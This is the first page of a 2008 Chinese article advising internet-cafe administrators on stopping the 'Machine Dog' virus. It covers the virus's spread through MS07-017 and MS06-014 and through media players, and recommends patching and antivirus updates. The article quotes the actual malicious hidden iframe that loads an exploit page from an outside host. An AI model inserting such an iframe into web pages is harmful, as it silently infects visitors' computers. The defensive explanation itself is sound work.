免费游戏更新软件网吧供求信息网吧求职招聘游戏更新情报全站搜索网吧论坛网络收藏夹BT下载
网站首页 | 网吧焦点 | 网盟论坛 | 网吧软件 | 网吧技术 | 地方频道 | 网吧方案 | 经营·管理 | 网吧政策 | 网吧配机 | 网吧资讯 | 博客
网吧展示 | 网络追踪 | 无盘技术 | 网吧系统 | 软件应用 | 硬件相关 | 网络技术 | 对比·更新 | 行业资讯 | 网吧程序 | 网游资讯 | 建站
您现在的位置: 天下网吧 >> 网吧焦点 >> 网吧技术 >> 软件技术 >> 正文
防范"机器狗"病毒的技巧心得
作者:[贾敬华i8中国] 来源:[i8中国] 时间:[2008-2-25] 添加到QQ收藏添加到QQ书签 添加到百度搜藏添加到百度搜藏

 

      冷静分析寻找“机器狗”病毒弱点

      从“机器狗”病毒的传播过程不难发现,能够破坏还原系统并不是“机器狗”病毒最具破坏力的地方,而是其通过IE链接进入网吧计算机系统,并自动下载木马程序。为此,我们寻找“机器狗”病毒的弱点之时,不要一味想着如何防止病毒破坏网吧计算机系统的还原系统,而是要如何切断“机器狗”病毒的传播途径。试想,封杀了“机器狗”病毒的传播方式,病毒又如何破坏网吧计算机的还原系统呢?通俗的说,要想消灭“机器狗”病毒,必须找到病毒的“根”,正所谓斩草除根嘛。

      在传播途径上,杀毒软件厂商经过研究后发现,“机器狗”病毒的传播主要是利用系统或应用软件的漏洞进行的。下面,笔者一一列举可以为“机器狗”病毒传播提供便捷通道的系统漏洞和应用软件漏洞。

      MS07-017漏洞:最初,“机器狗”病毒是利用下面一段代码进行传播的,代码内容如下:<iframe src="http://xx.exiao01.com/2.htm" width="20" height="1" frameborder="0"></iframe>病毒作者会将上述代码植入到各大网站中。查看被调用的2.htm的内容不难发现,病毒利用了操作系统的ANI漏洞加载木马,而这一过程恰恰是对微软操作系统MS07-017漏洞的“巧妙”应用。如果网吧机器没有安装MS07-017补丁,一旦访问了病毒代码,“机器狗”病毒便会不请自来。

图二MS07-017漏洞对XP操作系统的影响

      MS06-014漏洞:这个漏洞是很多网管都熟悉的一个系统漏洞,即IE自动下载。如果系统存在该漏洞的话,一旦计算机访问到带有“机器狗”病毒代码的网页,会利用IE浏览器的自动下载并执行的漏洞,就这样,“机器狗”病毒就在计算机中安营扎寨。

      在网吧的应用环境中,通过IE浏览器上网是每台计算机都有的操作,这无疑加大了感染“机器狗”病毒的机率。由于“机器狗”病毒是通过恶意代码进行传播的,也就是说,凡是可以执行网页代码的应用软件,都有可能成为“机器狗”病毒的传播渠道。

      细数网吧的各种应用软件,影音播放软件也是“机器狗”病毒的一大传播通道。众所周知,不少病毒作者会将病毒代码植入影音文件中,一旦用户使用诸如Realplayer等支持网页浏览的播放软件,病毒代码就会被执行,计算机将会感染病毒。Realplayer播放器、百度搜霸、PPStream播放器,以及迅雷客户端,都是“机器狗”病毒传播可以利用的通道。

      至此,我们找到了消灭“机器狗”病毒的方向。如果网吧计算机的操作系统及应用软件没有漏洞,“机器狗”病毒是很难感染网吧计算机系统的,更不会破坏网吧计算机的还原软件。为此,我们只要利用技术手段切断“机器狗”病毒的传播,我们就可以彻底消灭“机器狗”病毒,这也是该病毒的一个弱点。

      根据弱点制订防范“机器狗”策略

      通过上文的叙述我们可以了解到,“机器狗”病毒其实是通过操作系统及应用软件的漏洞进行传播的。如果能够利用技术手段阻止病毒进入网吧计算机,“机器狗”病毒就很难在横行。阻止“机器狗”病毒传播的技术策略主要有以下几个方面:

      1、及时安装各类安全补丁:从上文的叙述可以得知,网吧计算机之所以会感染“机器狗”病毒,因为操作系统和一些应用软件存在着诸多的安全漏洞,为此,网管必须在第一时间内安装操作系统和应用软件的安全补丁。

      网吧使用的是微软的操作系统,默认情况下,操作系统的自动更新功能是打开的,一旦微软发布新的安全补丁,自动更新功能将会自动安装这些安全补丁。对于诸如Realplayer等应用软件的安全漏洞,建议网管定期升级,一旦软件厂商推出了新版本,及时将网吧电脑的各种应用软件更新到最新的版本。为了方便检查网吧系统漏洞,笔者建议安装“奇虎360安全卫士”,因为该软件不仅可以检测操作系统的安全漏洞,还可以检测诸如Office和Realplay等应用软件的漏洞,并且支持自动安装。

图三软件的安全补丁

      2、及时更新病毒库:“机器狗”病毒入侵计算机的过程,其实是通过一个含有恶意代码网页进行传播的。对于一些恶意代码,一部分杀毒软件是具备查杀能力的。为此,要想准确的查杀带有“机器狗”病毒的恶意网页代码,必须及时更新病毒库。

上一页  [1] [2] [3] 下一页

点此下载免费游戏更新软件

本文关键字:机器狗
作者:[贾敬华i8中国] 来源:[i8中国]
          ★★★

  • 上一篇文章:
  • 下一篇文章:
  • 最新文章:
    固顶文章 [组图]推荐全免费精美快速游戏对比更新菜单软件
    固顶文章 鼠年“打狗棒”可免疫2.28最新机器狗,兼容冰点和各还原卡
    固顶文章 游戏更新情报站更新情报正确的阅读方法
    固顶文章 [图文]游戏更新网站调用代码,你的站调用了吗?
    普通文章 百度Hi新上市 特色功能抢先看[图]
    普通文章 2008-03-02游戏更新情报,敬请关注!
    普通文章 [图文]百度IM工具百度HI功能及内测版界面曝光!
    普通文章 [投票]目前您所采用的游戏自动更新方案(有盘/无盘)[
    普通文章 [国外]17岁少年攻破警方网站 嘲笑性留言导致被捕
    普通文章 2008-03-01游戏更新情报,敬请关注!

    优化大师尝鲜后新发

    简单PS步骤让你的

    流量管理案例:教育网

    巧借Updates

    小而强大的QQ垃圾
    以下为网友评论: 【点此发表评论】 【 进入论坛讨论 】【 Top
    ::发表评论::
     姓 名:
     评 分: 1分 2分 3分 4分 5分
     评论内容:
  • 严禁发表危害国家安全、政治、黄色淫秽等内容的评论。
  • 用户需对自己在使用天下网吧服务过程中的行为承担法律责任。
  • 本站管理员有权保留或删除评论内容。
  • 评论内容只代表机友个人观点,与本网站立场无关。
  • 声明:本站所发表的文章、评论及图片仅代表作者本人观点,与本站立场无关。若文章侵犯了您的相关权益,请及时与我们联系,我们会及时处理,感谢您对本站的支持!联系邮箱:support@txwb.com.

    相关文章
    360安全卫士的机器狗免疫
    机器狗v1.7专杀发布,增加开机
    机器狗相关防疫讨论集中贴!
    新的机器狗内网传输安全提示
    [11-30更新]底层拦截!从根本
    百度百科里的机器狗病毒.是这
    目前IGM,机器狗你认为最好的
    网吧遭离奇病毒袭击 新病毒“
    机器狗时代 你选择无盘还是有
    推荐图文

    小而强大的QQ垃圾清理软件

    缓存到内存上XP也玩超级兔

    360安全卫士的机器狗免疫

    免费网吧壁纸魔术师打造完美

    圣诞节主页源码圣诞活动方案

    打造属于自己的大图标菜单源

    不用注册不用验证的ISCSI,占

    中秋和奥运题材通用万象登陆
    关于天下 | 联系方式 | 版权声明 | 免责条款 | 隐私保护
    Email :support#txwb.com (#换成@) 天下网吧,网吧天下,网吧联盟,天下网盟,网吧联盟欢迎你|提出意见